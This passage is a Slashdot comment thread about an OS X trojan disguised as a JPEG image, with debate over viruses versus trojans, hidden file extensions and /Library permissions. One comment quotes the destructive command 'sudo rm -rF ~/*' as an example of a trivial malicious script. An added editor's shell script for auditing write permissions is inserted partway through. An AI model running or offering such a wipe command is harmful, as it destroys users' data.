      The real protection comes from being suspicious, in the first place.

    46. Re:Trojan Man? by m50d · · Score: 1
      This is a trojan, and if it replicates, then it's a file-propagating worm (as opposed to the e-mail- and network-propagating worms that plague Windows).

      Erm, if it spreads via IM as the summary suggests, then it's exactly the same as what plagues Windows. It may not technically be a virus under the original meaning of the term, but it's exactly the same thing as what we normally see called "viruses" on Windows.

      Face it, no OS is immune to these things.

      --
      I am trolling
    47. Re:Trojan Man? by sootman · · Score: 1, Offtopic

      Correct me if I'm wrong, but OS X, like RedHat Linux has for quite a while, uses single-user groups--that is, each user is the only member of a group which has the same name as the user's name. So the group bits are not entirely meaningful. Easy enough to test: can you
      touch /Users/<someone else>/Library/test
      ? I can't. If you can't you shouldn't need to go from 775 to 755.

      Each OS X system I have (10.3) shows the following ownerships in /Users/:
      'Shared' owned by root:wheel
      'admin' (first user created) owned by admin:staff
      all other users--admins and non-admins:
      'whatever' owned by whatever:whatever
      10.0-10.2 made bigger use of the Staff and Wheel groups, IIRC, but since 10.3, it's been one user per group for all but the first user created. (And that's why the first account I create is a generic admin account named admin--because early versions of OS X went batshit if you deleted the first user ever created, and I've kept the habit ever since. And it's always nice to have a clean account to switch into for testing.)

      --
      Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
    48. Re:Trojan Man? by v1 · · Score: 1

      FYI those are called "badges". In addition to the link arrow, icon views in Finder can also display red (-) "no access" badges on them. Open another user's home folder and you'll see what I mean. Drop folders have a downward arrow on them, as the Drop Box in another user's home folder will show.

      So this technique is already in use, just not for this purpose.

      It would be a nice touch for OS X to allow you to enable an "application badge" on any icon that was executable, scriptable, or otherwise would cause any contained code to execute when double clicked. Maybe a black letter "A" inside a green circle would work nicely. This would work just like the current badges, where the badge is not part of the icon, but rather is added by the OS as it is being rendered, so that the app could not prevent it from displaying. This would also require Apple to maintain some control over the badge APIs so that malware could not hook into the badge system and patch it to either not work or not work correctly (like to make the badge the same as the covered part of the app's icon, for infected files). I say this because Apple tends to make everything they can scriptable or patchable unless they have reason otherwise.

      And to call this a virus is sensationalism at best. Commonly accepted requirements for viruses include:

      1. unassisted introduction into a host, through networking or automatic "play when inserted" media rules, bugs in networking code, or back doors
      2. automatic execution of the contained script, code, or commands upon introduction to the host system, either by design or bug, executing in a security mode sufficient to perform (3) and (4)
      3. the ability to harvest or generate a list of additional hosts or contact points vulnerable to (1)
      4. propagation of a viable copy of itself to host systems found in (3)

      This "malware" is not capable of 2 because it requires manual execution by the host's operator. Admittedly, the security education level of the average Macintosh owner is lacking enough that we could say that a dialog that pops up and asks for your admin password has achieved automatic execution with privileges, because so many users are like Pavlov's dog: see password prompt, type in password. But this malware doesn't even automatically execute on the host system; it merely baits the user into double clicking it.

      After reading the technical analysis, it also appears to fail at 4 due to the pointer bug that was identified.

      Even if the pointer bug was fixed, it would still not qualify as a virus. It is at best a trojan. This is not too much more sophisticated than a "virus" that is a one-line applescript, "sudo rm -rF ~/*". Big whoop, we saw this one what, six months ago?

      --
      I work for the Department of Redundancy Department.
    49. Re:Trojan Man? by h3rmanni · · Score: 1

      It replicates, so it *is* a virus. Whether the user has to do something or not has no significance. Stop calling it a trojan to make it sound like it's not that bad. It's a virus.

    50. Re:Trojan Man? by eMartin · · Score: 1

      I love it when people talk about "real harm" to computers.

      Sure, I spend a day or two to reinstall if something goes wrong, and it takes a while for me to get settings back to how I like them, but I would be MUCH more concerned with the 300 GB of personal and work data that I have on my computer.

      And yes, I do have backups of most of it, but restoring and reorganizing that stuff would take me way longer than reinstalling software.

    51. Re:Trojan Man? by Gropo · · Score: 3, Insightful

      An even more novel solution: Apply a big fat red exclamation point to the bottom-right of the icon if the executable has never been run before--alongside prompting the user before running the executable for the first time (as is currently the case).

      --
      I hate Grammar Nazi's
    52. Re:Trojan Man? by somersault · · Score: 1

      Does OSX not display file extensions? The first thing I do when I have a new account on a Windows machine is show hidden files, and file extensions.. Gnome/KDE seem to show file extensions by default (am not so bothered about hidden directories and files since there are loaaaaaaaaaaaaaaads in the home directory..)

      It really is a pretty dumb idea not to have file extensions enabled, though I know that Macs use resource files rather than file extensions to determine filetype, but I didn't think that pictures would have separate resource files.. >_>

      --
      which is totally what she said
    53. Re:Trojan Man? by KillerDeathRobot · · Score: 1

      Open-apple + i (for get info) eliminates having to right or control click at all. :)

      --
      Thinkin' Lincoln - a web comic of presidential proportions
    54. Re:Trojan Man? by NatasRevol · · Score: 1

      "Um, why is my /Library chmod 775?"

      Simple. All the users need to READ & EXECUTE files in the Library. Look what's in there. Or better yet, try setting it to 770 or 750 and login as a regular user. I'm not sure you even could log in.

      It's also root:admin as owner:group for the folder. Thus you need to be at least in the admin group to effect any change in the Library folder. You don't think the admin group should be able to change the system library? That's your right, but it's not very logical. All admin users are one step away from root as su -s or sudo anyway.
      So, chmod 755 won't help much as it will still just ask you for your password to make changes in Library. It's better to run as a non-admin user.

      But, I agree this isn't a virus. It's hardly a trojan. It's a self-propagating script that requires several user interactions before doing anything. Since it only affects the user space - per the OS X security model - this will never get too far. Especially in the corporate environment where only ignorant IS folks let their users run as admin. Yes, some users run as admin and will get screwed, but that will never change - ignorance will always reign.

      --
      There are two types of people in the world: Those who crave closure
    55. Re:Trojan Man? by JWW · · Score: 2, Informative

      I agree it's a trojan, not a virus. If you turn on file extensions, you'd see that it's a .app with a jpeg icon. They're just being sneaky, not really using a flaw in the OS.

    56. Re:Trojan Man? by c_fel · · Score: 1

      I don't own a mac, but I know it is similar to my Linux box. Why doesn't it have a .jpeg extension? On Windows, an executable must be .exe, .com, .bat or .scr, but on a unix system, it just has to get the executable flag set. I guess if I was the trojan writer, I would have added the .jpeg extension (but then again, maybe the mac is different from UNIX on that point)...

      --
      I hate all sigs, mine included.
    57. Re:Trojan Man? by Vladimus · · Score: 3, Insightful
      So far there is still no malware for OS X that doesn't depend upon human stupidity for propagation.

      I've said it before, I'll say it again: Never underestimate the power of human stupidity.

      --
      A rolling stone is worth two in the bush!

    58. Re:Trojan Man? by v1 · · Score: 1

      A few people have suggested that it "might" ask for an admin password.

      If the operator is an admin, he is a member of the admin group. This means he always has additional access to files and folders. It does nothing to allow privileged access to processes. This means his script can do things like add global fonts, create global startup items, etc. All that he needs to install "hooks" to catch the next user or execute on the next reboot, all without having to enter a password.

      If you want privileges, like to change the startup disk, you need to elevate privs with something like sudo. That is what prompts for a password. Fortunately in the OS X security model, the system doesn't give you the option to bypass this requirement or to fish the password out of the system, so at least for these things, OS X is quite secure. The only exception to this is if you are logged in as root: you already have privileges and do not need to use sudo to access secured processes and structures. Some developers don't even bother checking for this possibility, as I have run installers while logged in as root and have been prompted for my password anyway. I would throw out a guess that fewer than 1 in 400 mac users have ever logged in as root, and fewer than 1 in 3000 log in regularly as root.

      --
      I work for the Department of Redundancy Department.
    59. Re:Trojan Man? by Haeleth · · Score: 1

      An easy way to determine what will happen on a double click without having to be aware of the extension is right-clicking the file and checking for the bold entry in the context menu.

      I just tried this, and on Win2k, at least, it just says "Open" for .exe, .bat, and .jpg. So, no, that's not a foolproof approach for everyone, even if by some chance it's different in XP.

    60. Re:Trojan Man? by LordSnooty · · Score: 1, Flamebait

      The very flaw, of course, that people regularly rip into Windows over. I've seen Windows' "hide extensions for known file types" option described as an OS flaw in the past, but of course in AppleWorld it's the trojan writer being "sneaky".

    61. Re:Trojan Man? by sootman · · Score: 1

      I would like to see this trojan myself. Pasting an icon is trivial, and the fact that it can do things to other users (via sudo or something similar) when run as an admin user *without* prompting for an admin password is surprising--everything I've seen, if you're going to do an installation, requires an admin's password, even if you're logged in as an admin at the time. Also, doesn't 10.4 pop up that little "you're running this application for the first time" window? I'd like to see this myself.

      In any case, this is why I say SCREW PRETTINESS. If a file's ability is going to be determined by its name, make extensions mandatory and un-hideable. For anything to respond in the GUI, that is. Apps and scripts called from a CLI don't need extensions, but clicking on a file with no extension should not do anything, ever, except prompt the user "what do you want to do?" with the only option being to try to VIEW the file (based on the first few bits)--"go ahead and try to execute whatever this is" should *not* be an option. Legacy OS 7-9 files present an issue but I'm sure it's nothing the collective minds in Cupertino can't figure out. App bundles would always show .app? Too fucking bad. Computers are too important not to know what's going on with them.

      Clever as the author was, if he was *really* smart, he would have, in addition to copying everything else he does to /tmp/ as described on the Ambrosia site, unpacked one screenshot and opened it with Preview. If users saw what they were expecting, they'd be that much less suspicious.

      --
      Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
    62. Re:Trojan Man? by Anonymous Coward · · Score: 0
      So far there is still no malware for OS X that doesn't depend upon human stupidity for propagation.

      You can make distinctions like that, but then you have to make it on the Windows side as well. Yes, other exploits have existed, but the real life big problems in the Windows world now are mostly Trojans and IM/mail propagating worms with an element of social engineering. Like this.

    63. Re:Trojan Man? by Anonymous Coward · · Score: 0

      It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

      Keep in mind there have been successful Windows worms that come in encrypted zip files. You have to open the zip, type in a password from the mail message, and then run the executable inside.

    64. Re:Trojan Man? by dfgchgfxrjtdhgh.jjhv · · Score: 2, Informative

      a virus is actually an executable that attaches itself to other executables & runs whenever they run.

      this is a trojan/worm, just like most malware that matches your incorrect description of a virus.

      computer virus n. A computer program that is designed to replicate itself by copying itself into the other programs stored in a computer. It may be benign or have a negative effect, such as causing a program to operate incorrectly or corrupting a computer's memory.
      http://www.answers.com/topic/computer-virus
    65. Re:Trojan Man? by Angostura · · Score: 1

      Bold text? That's so pre-Quartz Xtreme.

      Clearly executables should throb transparent, or jig about or ripple when you mouse over them or some-such. :-)

    66. Re:Trojan Man? by Anonymous Coward · · Score: 0

      Um, why is my /Library chmod 775?

      What's wrong with that? You're not actually running as a user in the admin group are you? If so, that's what you need to change first; not permissions.

    67. Re:Trojan Man? by log0n · · Score: 1

      It does, but it's turned off in Finder Preferences by default (no .ext is historical holdover from pre-OSX - never had them).

      If it becomes an issue Apple will change (ie: in update 10.4.6 or something) the default to on.

    68. Re:Trojan Man? by cortana · · Score: 2, Informative

      In which case, the program that created the file is broken.

    69. Re:Trojan Man? by bloodstains · · Score: 1

      How is "display suspicious file" any different than opening suspicious file in a viewer like Preview on the Mac?

      It's not.

      Preview will not run an executable any more than the "display" command will. So how is the command line giving you more protection?

      I tend to agree with you, however when using the GUI, people are more likely to simply double-click on the icon rather than specify to open the supposed jpeg in preview. It's not that the CLI is better than the GUI, as much as the default method of interacting with the CLI is different than with the GUI.

      The real protection comes from being suspicious, in the first place.

      Exactly.

    70. Re:Trojan Man? by tak+amalak · · Score: 1

      On the Mac, you would open the Finder Preferences and check "Show all file extensions" in the Advanced tab.

      --
      Don't lead me into temptation... I can find it myself.
    71. Re:Trojan Man? by Thalagyrt · · Score: 1

      Pictures have headers, such as image/jpeg. The OS *can* determine it by that, but generally jpegs on OS X will have a .jpg or .jpeg extension. If you copy a jpeg over with no extension, in my experience the OS has no idea what to do with it. We Mac users use file extensions like everyone else!

      --
      Buffalo buffalo Buffalo buffalo buffalo buffalo Buffalo buffalo!
    72. Re:Trojan Man? by Durandal64 · · Score: 1
      I am not saying executing the file it self. But if you download a .mp3 file does it play automaticly?
      No.
    73. Re:Trojan Man? by Raffaello · · Score: 2, Interesting

      By default Mac OS X does not show file extensions of applications. If, like many more computer literate users, you elect to "show all file extensions" (Finder:Preferences:Advanced), this "virus" (which is actually a trojan of course) will show up as YaddaYadda.jpg.app and you'll see that it's just a lame attempt at a trojan.

      That said, it will definitely bite many naive mac users who think they are invulnerable, and don't realize that the Finder's default behavior, though a convenience for the computer illiterate, is very dangerous precisely because it allows executable trojans to masquerade as data files such as graphics, etc.

    74. Re:Trojan Man? by mikiN · · Score: 1

      First Rule in Malware Prevention: Never Trust a Pretty Picture.

      Geez, I'd expect better from the MacOS developers. Enticing users to rely entirely on an icon to suggest the content and intention of a file is plain ridiculous.

      One thing both Microsoft and Apple should have done a long time ago is overlay a marker (like a small gear) onto icons of executable files and make it very hard to disable it (like the arrow on Windows shortcuts). This, combined with a tiny little bit of education would have prevented most if not all of the great email worm and trojan pandemics of recent years.

      --
      The Hacker's Guide To The Kernel: Don't panic()!
    75. Re:Trojan Man? by Anonymous Coward · · Score: 0
      Here's a cluestick, kiddo:
      • 0775 means everyone in the group can write to the directory. The correct permissions would be 0755 - nobody is talking about 0770, the group rights are the wrong ones.
      • Worse yet, if the files have the same permission, everyone in the same group can modify them without a password - so at least 01775 would have been saner
      • sudo su - requires a password; overwriting/adding files in a directory where you have write access does not

      In case you didn't realize yet, the last point is what makes it possible for a virus/trojan to write files if run from the right group without requiring sudo access.

      You don't think the admin group should be able to change the system library? That's your right, but it's not very logical. All admin users are one step away from root as su -s or sudo anyway.
      So, chmod 755 won't help much as it will still just ask you for your password to make changes in Library.

      No, it should not, without needing to provide a password. sudo su -, then changing, is ok, as it confirms the human in front of the computer is aware of the action. Again, with 0775 any program you launch can do it without having to su to root. It's hardly better than having c:\Windows writable only for power users, if your only user is in the power users group.

      It's better to run as a non-admin user.

      Ideally. In practice, for one's own desktop (the whole purpose of Macs) there's a trade-off. Why bother to disable root and use sudo if you need yet another layer of protection? And admin/wheel groups exist for a reason. But even a good security model can be botched by a poor implementation.

    76. Re:Trojan Man? by somersault · · Score: 1

      Yes, exactly, this is the same thing that causes quite a few viruses to succeed on Windows machines also. It's almost funny to see a file called jpg.exe, but also just so sad that people fall for it because they have no clue about computers (and because they can't google for their own pr0n >_> )

      --
      which is totally what she said
    77. Re:Trojan Man? by transient · · Score: 1

      Symlinks and aliases are quite different. You can move and rename the target of an alias, and the alias will still work.

      Not terribly relevant, I know, but worth pointing out nonetheless.

      --

      irb(main):001:0>
    78. Re:Trojan Man? by Overly+Critical+Guy · · Score: 3, Informative

      My file extensions show by default in all the OS X Tiger installations I've handled.

      Regardless, this "virus" pops up an admin password prompt, like every other proof-of-concept OS X trojan that's been written in the past, which effectively stops it in its tracks. This isn't really news except to Apple-haters who can go "SEE NOW U'VE GOT VIRUSES LOLZ."

      --
      "Sufferin' succotash."
    79. Re:Trojan Man? by Shanep · · Score: 1

      Open-apple + i (for get info) eliminates having to right or control click at all. :)

      Just for the silliness...

      I assume you meant option-apple + i. That is four button presses, as opposed to 3 for control clicking with a single mouse or 2 with a 2 or more button mouse. ; )~

      Option-apple + i : Mouse click to select file (1), hold option (2) and hold apple (3) and then press i (4).
      Control clicking: Hold Control (1) and mouse click file (2), mouse click Get Info (3).
      Right clicking: Right mouse click file (1), mouse click Get Info (2).

      Shit is this what happens when you become a Mac user?

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    80. Re:Trojan Man? by j-pimp · · Score: 1

      Open-apple + i

      Does anyone call it open apple anymore? Isn't it pointless considering that, unlike the Apple II, there is no closed apple key?

      --
      --- Justin Dearing http://www.justaprogrammer.net/ We're just programmers.
    81. Re:Trojan Man? by qw(name) · · Score: 1

      Possibly, but the whole point of this code is to be malicious. Why would a program create something that was intended to be executed by the user not set the executable bit? If anything, it could escape to a shell and make it executable, e.g. `chmod +x `. It's trivial.

    82. Re:Trojan Man? by Shanep · · Score: 1

      Open-apple

      Sorry, you meant the outlined Apple as opposed to the old outlined versus filled Apple.

      So it's 3,3,2?

      I really need to get to sleep. I think I've exceeded my stuff-up quotient for tonight.

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    83. Re:Trojan Man? by CODiNE · · Score: 1

      Seems suspicious of course, why would someone compress a JPEG? That's pretty odd, emailing a JPEG would let it show on the email but "Please unzip this image first to view" should raise a few alarms. Then again I'm sure plenty of "power users" regularly zip single image files before emailing them. ;-) That step was to both conceal that it wasn't an image and to keep the false icon on the executable.

      --
      Cwm, fjord-bank glyphs vext quiz
    84. Re:Trojan Man? by Anonymous Coward · · Score: 0

      Aliases are basically the same as hard links, right? Hard links refer to file inodes, so you can move or rename the target file and the link will still work, unlike a symlink. I don't think hard links can go across partitions, though.

    85. Re:Trojan Man? by Anonymous Coward · · Score: 0

      Tar.gz files downloaded in Safari already warn you that it might contain an app.

    86. Re:Trojan Man? by moonbender · · Score: 1

      I stand corrected. Thanks.

      --
      Switch back to Slashdot's D1 system.
    87. Re:Trojan Man? by Ahruman · · Score: 1

      Agreed. It is sufficient for administrators to be sudoers; there is no need for them to have write access to /Library (although mine is 755, for whatever reason) or, for that matter, to have write access to individual applications. I fully expect to be asked for an admin password to make any changes to these.

    88. Re:Trojan Man? by Ahruman · · Score: 1

      On a Mac, you can use Get Info; for the trojan it should say Kind: Unix Executable File (PowerPC), as opposed to, say, JPEG Image. You can't expect casual users to do this for every file they download, though.

    89. Re:Trojan Man? by croddy · · Score: 1
      That depends on the file manager you're using. I've not used Konqueror as a file manager recently, so I can't tell you much about KDE here. As for GNOME, Nautilus' default behavior is to generate a thumbnail of an image file. If something has a .jpg extension, and it's a binary executable with the execute bit set, Nautilus will fail to generate a thumbnail for it (your first clue). If you attempt to open it, Nautilus displays the following warning:

      The filename "1.jpg" indicates that this file is of type "JPEG image". The contents of the file indicate that the file is of type "executable". If you open this file, the file might present a security risk to your system. Do not open the file unless you created the file yourself, or received the file from a trusted source. To open the file, rename the file to the correct extension for "executable", then open the file normally. Alternatively, use the Open With menu to choose a specific application for the file.

      The only button in the warning dialog is "Cancel." In the case of a shell script masquerading as a jpeg, the behavior is the same. I'm kind of surprised this is still a problem on any platform, when the solution is so easy.

    90. Re:Trojan Man? by justin12345 · · Score: 1

      No, he meant open-apple, it's what the command key was called back in the day of the Apple II. Back then there was also a close-apple key. Somewhere along the line the apple keys became command. I think that the second pictograph used on the key (the little tied off square) might have been the closed apple pictograph on some keyboards. I'm not sure though, as at least some keyboards used a filled-in apple for close-apple.

      I still catch myself calling the command key the apple key or open-apple key when working with novice users. When you say command they get it confused with control about 80% of the time. It's easier to say apple since the key has an apple on it.

      --
      Cool art gallery, if you're into that sort of thing.
    91. Re:Trojan Man? by Anonymous Coward · · Score: 0

      It's been a while since I've done any Carbon programming (since before it was called Carbon) so my memory of aliases is fuzzy. But from what I remember, you're correct on a conceptual level, but aliases and hard links are implemented differently. At the file system level, an alias is no different from any other file. It has its own data, instead of simply sharing data with another file system entry. An alias is resolved to its target by system calls, while a hard link is "resolved" to its target by the file system itself.

      I might have the wrong idea about hard links too, having used them once in my entire life. :-)

    92. Re:Trojan Man? by Anonymous Coward · · Score: 0

      A mac only uses file extensions as a last resort. Unlike earlier versions of Mac OS, OS X does append them to files (so that windows users can actually have a clue as to the type of file.) Mac OS X still uses creator codes and file types (they are not the same thing at all). Windows only has type, there is no regard for creator (specifically which app created or last modified the file). In windows, you can't use multiple programs to open the same type of file by default. This is useful to microsoft, to push one particular application, but not to the end user. In OS X, the system tracks the creator, so you can open different instances of the same type of file depending on which program you prefer to use with that particular file. OR you can set it to open all versions of a given dot-3 extension with the same program, as in Windows.

    93. Re:Trojan Man? by cortana · · Score: 1

      If the program wanted to be malicious itself, there's no reason it would have to choose such a circuitous method to enact damage...

    94. Re:Trojan Man? by Anonymous Coward · · Score: 0

      just change the icon.

    95. Re:Trojan Man? by Myopic · · Score: 1

      your comment is moderated as funny but i don't get the joke. right click on the file in the Finder, choose Get Info, and look at the Kind of the document, which will be an Application for any executable file.

      is your joke about two-button mice? there are tons of two-button and more-button mice for Macs, and all Macs have supported those mice for, what, like a decade now. and mac users know that "right-click" is synonymous with "control-click". it's the same thing. in fact, isn't it silly that Windows users don't have the option to do that? (or, i don't know, maybe they do.) they can't even use one-button mice on their machines, those willy Windows people. Mac people can use any mouse they want and have full feature access.

      anyway, so yeah, right-click, Get Info, check the file Kind. do that for any file you don't trust. oh, and if you open a JPEG and it asks for your password, don't put it in.

    96. Re:Trojan Man? by bogado · · Score: 1

      It does not have 'helper apps'? It does not start the program bittorrent when downloading a .torrent? Does it run a plugin when the page states it to do it, like when you enter the site 'trailers.apple.com'?

      Well if it does not do any of the above I would congratulate you. But my guess is that it does many of the above, at least in its default state. Browsers today are very complex by themselves, html, xhtml, xml, css, canvas, mathml, svg, gif, jpeg, png and others are necessary (ok some of those aren't yet necessary) to handle by the browser itself. But beyond that there is java, quicktime, WMP, mpg, mp3, ogg and many, many, many other files that people want to be able to access in a somewhat seamless way in the web.

      The browser has to rely on external viewers and plugins to handle those formats, and maybe others that are yet to be invented. I only think that there should be a sandbox around all of that, so that when shit happens (and it will) at least you are already in the litter box. :-)

      --
      []'s Victor Bogado da Silva Lins

      ^[:wq

    97. Re:Trojan Man? by Myopic · · Score: 1

      counterpoint: i HATE that dialog box. i wouldn't mind it if it came with a Don't Show This Message Again checkbox, but for some damn reason it doesn't.

      yes, thank you Safari, i know i downloaded an application, i do it all the damn time. just shut up and unpack the archive. and while you're at it, tell your friend Mail to stop bouncing the dock and popping up dialog boxes every time it has trouble connecting to a mail server to send a message, just try again in a couple minutes and don't bother me.

    98. Re:Trojan Man? by Anonymous Coward · · Score: 0

      man file

      example
      [anonymous@coward ~]$ file foo.png
      foo.png: PNG image data, 100 x 100, 8-bit colormap, non-interlaced
      [anonymous@coward ~]$ file bar.jpg
      bar.jpg: JPEG image data, JFIF standard 1.01

    99. Re:Trojan Man? by Sir_Cockalot · · Score: 1

      That could be one way to solve the issue. Another way is to inform the user they are downloading an executable file.

    100. Re:Trojan Man? by PitaBred · · Score: 2

      The problem is that so many people think that their macs are unassailable, so they don't think twice about typing in their password. This wouldn't be seen in the wild if they didn't.

    101. Re:Trojan Man? by Firehed · · Score: 1
      While I'd have to agree (it did get me once, but that's what I get for taking my IT department seriously, the inept bastards), anyone who renames files more than once a month realizes how useful it is to not have to retype the extension a thousand times. And let's face it - most of the people getting viruses on windows don't know the difference between .jpg and .exe anyways. I think a "show extensions but don't change/highlight them on renaming" would be the best way to go about things, as you keep the convenience and gain that little bit of security.

      Of course, I'd bet that the "first" Windows XP virus was the writer being sneaky too. It's after the flaw/feature/whatever went unchanged for half a decade that people start needing to lay into them.

      --
      How are sites slashdotted when nobody reads TFAs?
    102. Re:Trojan Man? by jessecurry · · Score: 1

      no, he meant Open apple + i
      Open apple is the same key referred to as the command key.

      --
      Those who know, do not speak. Those who speak, do not know. ~Lao Tzu
    103. Re:Trojan Man? by PitaBred · · Score: 1

      But Linux DOES have extensions. All my jpegs end with .jpg or .jpeg, and I can tell they're jpegs by that. It's just that executable files by default don't have (or need) the extension. You can just about assume that any file without an extension in Linux is executable. But like other people in this thread have said, you can just use the file command, or look up the properties in your file manager. OSX, I'll let others speak for it. I've used it a bit, still don't like it.

    104. Re:Trojan Man? by yabos · · Score: 1

      You could easily name a program with the .jpg or whatever extension and chmod +x on the file and it's still executable. Extensions on anything but Windows don't really mean a whole lot.

    105. Re:Trojan Man? by hunterx11 · · Score: 1

      Actually, you're right; they simply changed the default to show all file extensions.

      --
      English is easier said than done.
    106. Re:Trojan Man? by HTTP+Error+403+403.9 · · Score: 1

      I thought if you double-clicked an application for the first time, OS X brings up a dialog box stating that this is the first time you have opened this application and if you want to continue.
      Is this still the case? Or did this trojan find a way around it?

      --
      I'm not a Troll, it's reverse psychology.
    107. Re:Trojan Man? by hackstraw · · Score: 1

      In the meantime, I'm going to be doing a lot of "sudo chmod 755 /Library".

      To be safe, and to protect yourself from your local admins, I would do "sudo chown -R root /Library; sudo chmod go-w -R /Library".

      Personally, I wouldn't worry about it. A socially engineered trojaned executable can be launched or stored just about anywhere. I don't see what is so special about /Library.
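
Editor's added example, not hackstraw's or Ahruman's commands (comments 87 and 107): a quick audit of what the `sudo chown -R root /Library; sudo chmod go-w -R /Library` advice above is meant to achieve, written as POSIX sh functions so you can check a tree before and after tightening it. The chown step is left out so the functions can run unprivileged against a throwaway directory; on the real /Library, run tighten_tree under sudo. The directory and file names used in the test are made up.

```shell
#!/bin/sh
# Added example (not from the thread): audit and tighten a directory tree so
# that nothing under it is writable by group or others. On a Mac this is the
# check for whether /Library (or /Applications) can be modified by an admin
# user without authenticating, which is what the trojan discussion is about.

# Print every entry under DIR that has the group-write (020) or other-write
# (002) bit set. Symlinks are skipped: their own mode bits are meaningless.
find_loose_perms() {
    find "$1" ! -type l \( -perm -020 -o -perm -002 \) -print
}

# Print entries under DIR not owned by root. Not asserted on in tests, since
# the owner of a test tree is whoever runs it; useful on the real /Library
# as the check for hackstraw's "chown -R root".
find_non_root_owned() {
    find "$1" ! -user root -print
}

# 0 if nothing under DIR is group- or world-writable.
tree_is_tight() {
    [ -z "$(find_loose_perms "$1")" ]
}

# Remove group and other write permission everywhere below DIR (and on DIR
# itself). Same effect as "chmod go-w -R", which needs sudo on /Library.
tighten_tree() {
    chmod -R go-w "$1"
}
```

Typical use on a Mac: `find_loose_perms /Library` and `find_non_root_owned /Library` to see what an admin-group process could currently replace, then `sudo sh -c '. ./audit.sh; tighten_tree /Library'` once you are happy with the list. Note that this does not touch the execute bits or ownership; it only closes the write permission that lets a non-root user drop files into a system directory.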

    108. Re:Trojan Man? by cadaeibfed · · Score: 1

      You can turn off this warning by unchecking 'open safe files' in Safari>Preferences>General.

    109. Re:Trojan Man? by cmdrbuzz · · Score: 1
      Actually, I get the impression that this is an old-style Mac executable, which does not use the .app extension.

      I don't think you're right on this because it is distributed via a tar archive, and I don't think that tar can handle the resource fork required to have the file-type set to APPL.
      And if you Get-Info on the file, however it may be an executable, it will clearly indicate that it is not a document.

      Oh, and the +x access to the file is coming from the tar archive, just the same as it would on any UNIX style OS.

      I think Apple may need to make it *really* obvious that this is an executable, and you're about to do something that could be really dumb, but I don't know what they should do, without making it another 'everyone just clicks OK, doesn't read the message'.

    110. Re:Trojan Man? by Anonymous Coward · · Score: 0

      "Right"-click?

      I'm a lefty and have my buttons reversed, you insensitive clod!

    111. Re:Trojan Man? by MoneyT · · Score: 1

      I would think most people would think twice about having to type in their password to open a picture, but maybe I'm just too optimistic. Of course, for people like that, no amount of protection short of a knowledgeable human looking over their shoulder 24/7 will save them.

      --
      T Money
      World Domination with a plastic spoon since 1984
    112. Re:Trojan Man? by GlassHeart · · Score: 1
      it will definitely bite many naive mac users who think they are invulnerable, and don't realize that the Finder's default behavior, though a convenience for the computer illiterate, is very dangerous precisely because it allows executable trojans to masquerade as data files such as graphics, etc.

      Even if it was clearly marked as an executable, how many of these naive users do you think will run it anyway given the promise of free porn or something?

    113. Re:Trojan Man? by javaxman · · Score: 1
      That said, it will definitely bite many naive mac users who think they are invulnerable, and don't realize that the Finder's default behavior, though a convenience for the computer illiterate, is very dangerous precisely because it allows executable trojans to masquerade as data files such as graphics, etc.

      This is true... except for the fact that when you download an uncompressed file, or uncompress the file, it's noticed as being an application, so you get this dialog along the lines of "Such and such is an executable, do you want to download it"... and apparently if you're not an admin user, this one tries to install something in /Applications or somewhere else where you end up looking at an authentication dialog, at which point you're likely to wonder WTF. Unless, like you say, you're a naive mac user who's used to always saying OK to anything.

      This will get plenty of folks to stop using their Admin accounts so much, though. I know I'm guilty of using my Admin account all the time ( looks around sheepishly ) and was waiting for just this type of event to stop doing that. Lucky for me it's easy enough to create a new account, designate it as admin, and change the permissions on the account I regularly use...

      Damn, I have to do that at work, too. Stupid trojan writers.

    114. Re:Trojan Man? by GlassHeart · · Score: 1
      Maybe we should be able to override the OS so that no matter what icon the executable file says it wants to display, the OS always shows an icon clearly depicting the fact that the file is an executable.

      ...so that when you look in the Applications directory, you see a hundred identical icons?

    115. Re:Trojan Man? by Anonymous Coward · · Score: 0

      Disclaimer: not a Mac guy...

      1) View the properties.
      2) From the command line run "file X"
      3) Try to open the file in a jpeg viewer

      Security tricks:

      1) If you download the file, it should not be executable by default: in *nix, you don't make a file executable by the extension...it is a permission you have to set.

      2) The problem will only arise if you are using one specific JPG icon. If you use a different viewer or otherwise change the associated icon, the file will be visibly different from all of your other jpgs.

      3) You could schedule a regular job to check for odd permissions like executable jpgs. This might be a bit much for the average user but you can expect to see this as a default setting at some point in the future.

    116. Re:Trojan Man? by RemovableBait · · Score: 1

      I think a "show extensions but don't change/highlight them on renaming" would be the best way to go about things

      Microsoft obviously thinks so too, because this is the default behaviour in the current Windows Vista CTP builds. I'm not sure how difficult it could possibly be for them to add this function to XP with a non-critical update.

    117. Re:Trojan Man? by greed · · Score: 1
      Apple got very vigorously ripped on for switching to Windows-type file suffixes and hiding them by default when the OS X Public Betas came out. There was some amount of yelling going around before that with the Developer Previews. Google should be able to find it for you. The concession Apple made at the time was the addition of the "Show extension" or "Use extension" checkboxes. (And some of the "Use extension" ones just cause the Save dialog to show the extension it will add--it always adds one.) Damn it, we liked type/creator, all they needed was a way of configuring a way to open a given type in a particular app rather than the creator app, and everyone could be happy. (Like having most things open in the creator, but all jpegs and gifs open in your favorite viewer.)

      I believe as of Tiger the default is no longer to hide extensions, but I've never run a fresh install of Tiger, only upgrades from Panther (from Jaguar (from Cheetah...)).

      But, even with Windows-type suffixes, you still have to deal with UNIX Execute permission and have a well-formed executable. (Yes, I know Windows NT and NTFS have an execute permission, and the kernel obeys it. It's just set to ON on every file I've ever seen, except where I've explicitly cleared it.)

      What this means is that Apple has an excellent opportunity to somehow make program and data files visually distinct. Use the X bit, the TYPE code, and/or the file header to highlight "clicking on me starts a new application" somehow. Overlaid gear icon? Obviously you have to mark applications, if you mark data as "safe", then someone just has to fake up an application icon with the "safe" mark.

      Now you've still got Carbon and Classic-created files which have their X bits turned on by default because the APIs didn't exist--that default really should be changed to X bit OFF. After all, how many Carbon and Classic applications create executable files? Someone writing shell scripts in a Classic program is going to know how to deal with missing X, I hope. (As long as the interface layer preserves X on overwrite, this would be like having to chmod +x your new shell script on standard Unix.)

    118. Re:Trojan Man? by mrchaotica · · Score: 1
      My file extensions show by default in all the OS X Tiger installations I've handled.
      Except for certain ones, like .app, .bundle, etc.
      --

      "[Regarding the 'cloud,'] ownership was what made America different than Russia." -- Woz

